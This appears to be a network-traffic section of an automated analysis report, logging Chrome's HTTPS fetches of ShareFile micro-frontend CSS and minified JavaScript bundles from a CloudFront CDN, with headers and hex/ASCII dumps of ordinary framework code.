                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      94192.168.2.174981413.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC575OUTGET /sharefile-web/sharefiledev-tenant-mgt-pilet/1.2.0/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 10:55:24 GMT
                                                                                                                                                                                                                      Last-Modified: Thu, 03 Oct 2024 13:08:00 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 4cc2a0a7eb7d5483edc69be298297f9e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: cF8AeTi_-QU4CHSc36ng2voXcPmVhyy10UT7464JFCA16KedEacgeQ==
                                                                                                                                                                                                                      Age: 31254
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      95192.168.2.174981613.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC574OUTGET /sharefile-web/sharefiledev-identity-pilet/1.0.24/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Fri, 11 Oct 2024 13:52:21 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 07:16:16 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 f655cacd0d6f7c5dc935ea687af6f3c0.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: fsXXNQTEBpe-SGYMWEANTKqqzxKdtvuG1Nuvxtba3Xj3d-cCU8SjUg==
                                                                                                                                                                                                                      Age: 44402
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      96192.168.2.174981513.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC420OUTGET /sharefile-web/sharefiledev-identity-pilet/1.0.24/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC521INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 28069
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Fri, 11 Oct 2024 13:52:21 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:17 GMT
                                                                                                                                                                                                                      ETag: "53988d5b050bd0e958bb6c2c66bd557f"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 5076c8187f430eebe5e26fc594d6125a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: HIPpu1QPkGgxeDsdqrGw1ohoQCAd7bpPYmn6UOyWvAqmIt4mkkXiMw==
                                                                                                                                                                                                                      Age: 1
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 69 64 65 6e 74 69 74 79 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 61 3d 7b 7d 2c 6f 3d 7b 7d 3b 72 65 74 75 72 6e 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 2e 63 6f 6c 6f 72 50 61 6c 65 74 74 65 3d 65 2e 63 6f 6c 6f 72 50 61 6c 65 74 74 65 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 41 6c 65 72 74 3d 65 2e 41 6c 65 72 74 2c 6e 2e
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevidentitypilet,{})System.register(["@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var r={},n={},a={},o={};return{setters:[function(e){r.colorPalette=e.colorPalette},function(e){n.Alert=e.Alert,n.
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC11685INData Raw: 34 38 68 2d 31 2e 34 38 32 56 34 2e 35 33 6c 2d 39 2e 38 34 36 20 39 2e 38 34 37 2d 31 2e 30 34 38 2d 31 2e 30 34 38 7a 22 7d 29 2c 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 64 3a 22 4d 32 20 34 2e 37 37 38 68 31 30 76 31 2e 34 38 31 48 33 2e 34 38 31 76 31 34 2e 32 36 68 31 34 2e 32 36 56 31 32 68 31 2e 34 38 31 76 31 30 48 32 7a 22 7d 29 29 7d 2c 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 70 65 2c 61 28 7b 7d 2c 65 2c 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 6a 65 7d 29 29 7d 2c 6b 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22
                                                                                                                                                                                                                      Data Ascii: 48h-1.482V4.53l-9.846 9.847-1.048-1.048z"}),n.createElement("path",{fill:"currentColor",d:"M2 4.778h10v1.481H3.481v14.26h14.26V12h1.481v10H2z"}))},ze=function(e){return n.createElement(pe,a({},e,{component:je}))},ke=function(){return n.createElement("svg"


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      97192.168.2.174981913.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC573OUTGET /sharefile-web/sharefiledev-rubicon-pilet/0.33.5/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 10:55:24 GMT
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 18:14:02 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 80826ca6c4fd6005aeacf5a03c8d42e8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: FsudxGgD8DQifKy8zVPWFhGKFilqAkPTuWX4iLbFp6OIQ8azv5P71A==
                                                                                                                                                                                                                      Age: 31255
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      98192.168.2.174981813.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC419OUTGET /sharefile-web/sharefiledev-rubicon-pilet/0.33.5/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 167028
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 18:14:02 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:18 GMT
                                                                                                                                                                                                                      ETag: "d415917c44edb49d2128cf696d92474c"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 5a5b94c62ea85e0c0d78b169589b08b4.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: jaWTJmnw3kfEd4TZ04HkEBRvuJFZvmk1ttDVRlXv8FF7XG6H_xPxIA==
                                                                                                                                                                                                                      Age: 2
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 72 75 62 69 63 6f 6e 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 73 3d 7b 7d 2c 61 3d 7b 7d 2c 75 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevrubiconpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},s={},a={},u={},c={};return
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC16384INData Raw: 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 22 3b 72 65 74 75 72 6e 20 6e 2e 73 70 6c 69 74 28 22 20 22 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 65 5b 6e 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 74 2e 70 75 73 68 28 65 5b 6e 5d 2b 22 3b 22 29 3a 72 2b 3d 6e 2b 22 20 22 7d 29 29 2c 72 7d 76 61 72 20 69 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 65 2e 6b 65 79 2b 22 2d 22 2b 74 2e 6e 61 6d 65 3b 21 31 3d 3d 3d 6e 26 26 65 2e 72 65 67 69 73 74 65 72 65 64 5b 72 5d 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 28 65 2e 72 65 67 69 73 74 65 72 65 64 5b 72 5d 3d 74 2e 73 74 79 6c 65 73 29 7d 2c 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 69 28 65 2c 74 2c 6e 29 3b 76 61 72 20 72 3d 65 2e 6b 65 79 2b 22 2d
                                                                                                                                                                                                                      Data Ascii: ,t,n){var r="";return n.split(" ").forEach((function(n){e[n]!==undefined?t.push(e[n]+";"):r+=n+" "})),r}var i=function(e,t,n){var r=e.key+"-"+t.name;!1===n&&e.registered[r]===undefined&&(e.registered[r]=t.styles)},o=function(e,t,n){i(e,t,n);var r=e.key+"-
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC16384INData Raw: 69 73 2e 6d 75 74 61 74 69 6f 6e 43 61 63 68 65 2e 63 6f 6e 66 69 67 29 2e 6f 6e 45 72 72 6f 72 29 7c 7c 68 2e 63 61 6c 6c 28 70 2c 65 2c 74 68 69 73 2e 73 74 61 74 65 2e 76 61 72 69 61 62 6c 65 73 2c 74 68 69 73 2e 73 74 61 74 65 2e 63 6f 6e 74 65 78 74 2c 74 68 69 73 29 2c 61 77 61 69 74 28 6e 75 6c 6c 3d 3d 28 64 3d 28 79 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 29 2e 6f 6e 45 72 72 6f 72 29 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 79 2c 65 2c 74 68 69 73 2e 73 74 61 74 65 2e 76 61 72 69 61 62 6c 65 73 2c 74 68 69 73 2e 73 74 61 74 65 2e 63 6f 6e 74 65 78 74 29 29 2c 61 77 61 69 74 28 6e 75 6c 6c 3d 3d 28 6d 3d 28 67 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 29 2e 6f 6e 53 65 74 74 6c 65 64 29 3f 76 6f 69 64 20 30 3a 6d 2e 63 61 6c 6c 28 67 2c 76 6f 69
                                                                                                                                                                                                                      Data Ascii: is.mutationCache.config).onError)||h.call(p,e,this.state.variables,this.state.context,this),await(null==(d=(y=this.options).onError)?void 0:d.call(y,e,this.state.variables,this.state.context)),await(null==(m=(g=this.options).onSettled)?void 0:m.call(g,voi
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC14808INData Raw: 6f 72 22 3d 3d 3d 65 2e 73 74 61 74 75 73 2c 69 73 49 64 6c 65 3a 22 69 64 6c 65 22 3d 3d 3d 65 2e 73 74 61 74 75 73 2c 6d 75 74 61 74 65 3a 74 68 69 73 2e 6d 75 74 61 74 65 2c 72 65 73 65 74 3a 74 68 69 73 2e 72 65 73 65 74 7d 3b 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 73 75 6c 74 3d 74 7d 6e 6f 74 69 66 79 28 65 29 7b 71 2e 62 61 74 63 68 28 28 28 29 3d 3e 7b 76 61 72 20 74 2c 6e 2c 72 2c 69 3b 69 66 28 74 68 69 73 2e 6d 75 74 61 74 65 4f 70 74 69 6f 6e 73 29 69 66 28 65 2e 6f 6e 53 75 63 63 65 73 73 29 6e 75 6c 6c 3d 3d 28 74 3d 28 6e 3d 74 68 69 73 2e 6d 75 74 61 74 65 4f 70 74 69 6f 6e 73 29 2e 6f 6e 53 75 63 63 65 73 73 29 7c 7c 74 2e 63 61 6c 6c 28 6e 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 73 75 6c 74 2e 64 61 74 61 2c 74 68 69 73 2e 63 75
                                                                                                                                                                                                                      Data Ascii: or"===e.status,isIdle:"idle"===e.status,mutate:this.mutate,reset:this.reset};this.currentResult=t}notify(e){q.batch((()=>{var t,n,r,i;if(this.mutateOptions)if(e.onSuccess)null==(t=(n=this.mutateOptions).onSuccess)||t.call(n,this.currentResult.data,this.cu
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC447INData Raw: 6e 63 74 69 6f 6e 20 69 28 65 29 7b 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6e 75 6c 6c 3d 3d 65 3f 22 63 61 6e 63 65 6c 65 64 22 3a 65 2c 72 2e 45 52 52 5f 43 41 4e 43 45 4c 45 44 29 2c 74 68 69 73 2e 6e 61 6d 65 3d 22 43 61 6e 63 65 6c 65 64 45 72 72 6f 72 22 7d 6e 28 39 35 31 36 29 2e 69 6e 68 65 72 69 74 73 28 69 2c 72 2c 7b 5f 5f 43 41 4e 43 45 4c 5f 5f 3a 21 30 7d 29 2c 65 2e 65 78 70 6f 72 74 73 3d 69 7d 2c 33 38 36 34 3a 65 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 28 21 65 7c 7c 21 65 2e 5f 5f 43 41 4e 43 45 4c 5f 5f 29 7d 7d 2c 35 31 35 35 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 39 35 31 36 29 2c 69 3d
                                                                                                                                                                                                                      Data Ascii: nction i(e){r.call(this,null==e?"canceled":e,r.ERR_CANCELED),this.name="CanceledError"}n(9516).inherits(i,r,{__CANCEL__:!0}),e.exports=i},3864:e=>{"use strict";e.exports=function(e){return!(!e||!e.__CANCEL__)}},5155:(e,t,n)=>{"use strict";var r=n(9516),i=
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC16384INData Raw: 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 28 74 3d 74 7c 7c 7b 7d 29 2e 75 72 6c 3d 65 3a 74 3d 65 7c 7c 7b 7d 2c 28 74 3d 61 28 74 68 69 73 2e 64 65 66 61 75 6c 74 73 2c 74 29 29 2e 6d 65 74 68 6f 64 3f 74 2e 6d 65 74 68 6f 64 3d 74 2e 6d 65 74 68 6f 64 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3a 74 68 69 73 2e 64 65 66 61 75 6c 74 73 2e 6d 65 74 68 6f 64 3f 74 2e 6d 65 74 68 6f 64 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 73 2e 6d 65 74 68 6f 64 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3a 74 2e 6d 65 74 68 6f 64 3d 22 67 65 74 22 3b 76 61 72 20 6e 3d 74 2e 74 72 61 6e 73 69 74 69 6f 6e 61 6c 3b 6e 21 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 63 2e 61 73 73 65 72 74 4f 70 74 69 6f 6e 73 28 6e 2c 7b 73 69 6c 65 6e 74 4a 53 4f 4e 50 61 72 73 69 6e 67 3a 6c 2e 74
                                                                                                                                                                                                                      Data Ascii: g"==typeof e?(t=t||{}).url=e:t=e||{},(t=a(this.defaults,t)).method?t.method=t.method.toLowerCase():this.defaults.method?t.method=this.defaults.method.toLowerCase():t.method="get";var n=t.transitional;n!==undefined&&c.assertOptions(n,{silentJSONParsing:l.t
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC16384INData Raw: 6f 7d 29 3b 76 61 72 20 72 3d 6e 28 32 34 34 35 29 2c 69 3d 6e 28 34 38 37 36 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 76 61 72 20 74 3d 65 2e 6c 6f 61 64 69 6e 67 2c 6e 3d 65 2e 73 74 79 6c 65 2c 6f 3d 65 2e 63 68 69 6c 64 72 65 6e 3b 72 65 74 75 72 6e 28 30 2c 72 2e 59 29 28 69 2e 53 70 69 6e 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 73 74 79 6c 65 3a 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 7d 2c 6e 29 2c 73 70 69 6e 6e 69 6e 67 3a 74 7d 2c 7b 63 68 69 6c 64 72 65 6e 3a 6f 7d 29 2c 76 6f 69 64 20 30 29 7d 7d 2c 37 36 31 38 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73
                                                                                                                                                                                                                      Data Ascii: o});var r=n(2445),i=n(4876);function o(e){var t=e.loading,n=e.style,o=e.children;return(0,r.Y)(i.Spin,Object.assign({style:Object.assign({display:"flex",alignItems:"center",justifyContent:"center"},n),spinning:t},{children:o}),void 0)}},7618:(e,t,n)=>{"us
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC16384INData Raw: 28 65 2c 22 64 75 70 6c 69 63 61 74 65 64 20 6d 61 70 70 69 6e 67 20 6b 65 79 22 29 29 2c 22 5f 5f 70 72 6f 74 6f 5f 5f 22 3d 3d 3d 69 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 69 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 6f 7d 29 3a 74 5b 69 5d 3d 6f 2c 64 65 6c 65 74 65 20 6e 5b 69 5d 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 43 65 28 65 29 7b 76 61 72 20 74 3b 31 30 3d 3d 3d 28 74 3d 65 2e 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 65 2e 70 6f 73 69 74 69 6f 6e 29 29 3f 65 2e 70 6f 73 69 74 69 6f 6e 2b 2b 3a 31 33 3d 3d 3d 74 3f 28 65 2e 70 6f 73 69 74 69 6f 6e 2b 2b 2c 31 30 3d 3d 3d 65 2e
                                                                                                                                                                                                                      Data Ascii: (e,"duplicated mapping key")),"__proto__"===i?Object.defineProperty(t,i,{configurable:!0,enumerable:!0,writable:!0,value:o}):t[i]=o,delete n[i];return t}function Ce(e){var t;10===(t=e.input.charCodeAt(e.position))?e.position++:13===t?(e.position++,10===e.
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC16384INData Raw: 31 30 32 34 2a 28 72 2d 35 35 32 39 36 29 2b 6e 2d 35 36 33 32 30 2b 36 35 35 33 36 3a 72 7d 66 75 6e 63 74 69 6f 6e 20 78 74 28 65 29 7b 72 65 74 75 72 6e 2f 5e 5c 6e 2a 20 2f 2e 74 65 73 74 28 65 29 7d 76 61 72 20 4f 74 3d 31 2c 43 74 3d 32 2c 45 74 3d 33 2c 41 74 3d 34 2c 6b 74 3d 35 3b 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 73 2c 61 29 7b 76 61 72 20 75 2c 63 2c 6c 3d 30 2c 66 3d 6e 75 6c 6c 2c 68 3d 21 31 2c 70 3d 21 31 2c 64 3d 2d 31 21 3d 3d 72 2c 79 3d 2d 31 2c 6d 3d 76 74 28 63 3d 53 74 28 65 2c 30 29 29 26 26 63 21 3d 3d 4e 65 26 26 21 67 74 28 63 29 26 26 63 21 3d 3d 56 65 26 26 63 21 3d 3d 65 74 26 26 63 21 3d 3d 4a 65 26 26 63 21 3d 3d 57 65 26 26 63 21 3d 3d 6e 74 26 26 63 21 3d 3d 72 74 26 26 63 21 3d 3d 6f
                                                                                                                                                                                                                      Data Ascii: 1024*(r-55296)+n-56320+65536:r}function xt(e){return/^\n* /.test(e)}var Ot=1,Ct=2,Et=3,At=4,kt=5;function Rt(e,t,n,r,i,o,s,a){var u,c,l=0,f=null,h=!1,p=!1,d=-1!==r,y=-1,m=vt(c=St(e,0))&&c!==Ne&&!gt(c)&&c!==Ve&&c!==et&&c!==Je&&c!==We&&c!==nt&&c!==rt&&c!==o
